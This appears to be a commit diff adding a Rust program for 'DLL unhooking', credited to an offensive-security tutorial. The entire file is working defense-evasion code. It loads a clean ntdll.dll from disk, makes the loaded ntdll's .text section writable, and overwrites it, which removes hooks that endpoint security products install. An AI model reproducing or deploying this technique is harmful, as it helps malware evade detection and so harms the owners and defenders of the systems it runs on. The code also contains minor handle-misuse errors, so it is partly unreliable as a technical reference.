|
| 1 | +/* |
| 2 | + DLL Unhooking |
| 3 | + Thanks to RedTeamNotes: |
| 4 | + Resource Used From [https://www.ired.team/offensive-security/defense-evasion/how-to-unhook-a-dll-using-c++] |
| 5 | + Author: @5mukx |
| 6 | +*/ |
| 7 | + |
| 8 | + |
| 9 | +use std::ffi::CString; |
| 10 | +use std::ptr::{self, null_mut}; |
| 11 | + |
| 12 | +use winapi::shared::minwindef::HMODULE; |
| 13 | +use winapi::um::fileapi::{CreateFileA, OPEN_EXISTING}; |
| 14 | +use winapi::um::handleapi::CloseHandle; |
| 15 | +use winapi::um::libloaderapi::GetModuleHandleA; |
| 16 | +use winapi::um::memoryapi::{MapViewOfFile, VirtualProtect, FILE_MAP_READ}; |
| 17 | +use winapi::um::psapi::GetModuleInformation; |
| 18 | +use winapi::um::winbase::CreateFileMappingA; |
| 19 | +use winapi::um::winnt::{GENERIC_READ, IMAGE_DOS_HEADER, IMAGE_NT_HEADERS64, IMAGE_SECTION_HEADER, PAGE_EXECUTE_READWRITE, PAGE_READONLY, SEC_IMAGE}; |
| 20 | +use winapi::um::{processthreadsapi::GetCurrentProcess, psapi::MODULEINFO}; |
| 21 | +use winapi::ctypes::c_void; |
| 22 | + |
| 23 | +fn main(){ |
| 24 | + unsafe{ |
| 25 | + let process: *mut c_void = GetCurrentProcess(); |
| 26 | + let mut mi: MODULEINFO = std::mem::zeroed(); |
| 27 | + let ntdll_cstr = CString::new("ntdll.dll").unwrap(); |
| 28 | + let ntdll_module: HMODULE = GetModuleHandleA(ntdll_cstr.as_ptr()); |
| 29 | + |
| 30 | + GetModuleInformation( |
| 31 | + process, |
| 32 | + ntdll_module, |
| 33 | + &mut mi, |
| 34 | + std::mem::size_of::<MODULEINFO>() as u32, |
| 35 | + ); |
| 36 | + |
| 37 | + let ntdll_base = mi.lpBaseOfDll; |
| 38 | + let ntdll_file = CreateFileA( |
| 39 | + ntdll_cstr.as_ptr(), |
| 40 | + GENERIC_READ, |
| 41 | + 0, |
| 42 | + null_mut(), |
| 43 | + OPEN_EXISTING, |
| 44 | + 0, |
| 45 | + null_mut(), |
| 46 | + ); |
| 47 | + |
| 48 | + let ntdll_mapping = CreateFileMappingA( |
| 49 | + ntdll_file, |
| 50 | + null_mut(), |
| 51 | + PAGE_READONLY | SEC_IMAGE, |
| 52 | + 0, |
| 53 | + 0, |
| 54 | + ptr::null(), |
| 55 | + ); |
| 56 | + |
| 57 | + let ntdll_mapping_address = MapViewOfFile( |
| 58 | + ntdll_mapping, |
| 59 | + FILE_MAP_READ, |
| 60 | + 0, |
| 61 | + 0, |
| 62 | + 0 |
| 63 | + ); |
| 64 | + |
| 65 | + let hook_dos_header = ntdll_base as *const IMAGE_DOS_HEADER; |
| 66 | + let hook_nt_header = (ntdll_base as usize + (*hook_dos_header).e_lfanew as usize) as *const IMAGE_NT_HEADERS64; |
| 67 | + |
| 68 | + for i in 0..(*hook_nt_header).FileHeader.NumberOfSections{ |
| 69 | + let hook_sec_header = (hook_nt_header as usize + 0xF8 + (i as usize * 0x28)) as *const IMAGE_SECTION_HEADER; |
| 70 | + |
| 71 | + if (*hook_sec_header).Name.starts_with(b".text\0") { |
| 72 | + let mut old_protect = 0u32; |
| 73 | + let section_base = (ntdll_base as usize + (*hook_sec_header).VirtualAddress as usize) as *mut u8; |
| 74 | + let section_size = *(*hook_sec_header).Misc.VirtualSize() as usize; |
| 75 | + |
| 76 | + VirtualProtect( |
| 77 | + section_base as *mut _, |
| 78 | + section_size, |
| 79 | + PAGE_EXECUTE_READWRITE, |
| 80 | + &mut old_protect, |
| 81 | + ); |
| 82 | + |
| 83 | + std::ptr::copy_nonoverlapping( |
| 84 | + (ntdll_mapping_address as usize + (*hook_sec_header).VirtualAddress as usize) as *const u8, // Source Address |
| 85 | + section_base, // Destination Address |
| 86 | + section_size, // Size |
| 87 | + ); |
| 88 | + |
| 89 | + VirtualProtect( |
| 90 | + section_base as *mut _, |
| 91 | + section_size, |
| 92 | + old_protect, |
| 93 | + &mut old_protect, |
| 94 | + ); |
| 95 | + } |
| 96 | + } |
| 97 | + CloseHandle(process); |
| 98 | + CloseHandle(ntdll_file); |
| 99 | + CloseHandle(ntdll_mapping); |
| 100 | + CloseHandle(ntdll_module as *mut c_void); |
| 101 | + } |
| 102 | +} |
| 103 | + |
0 commit comments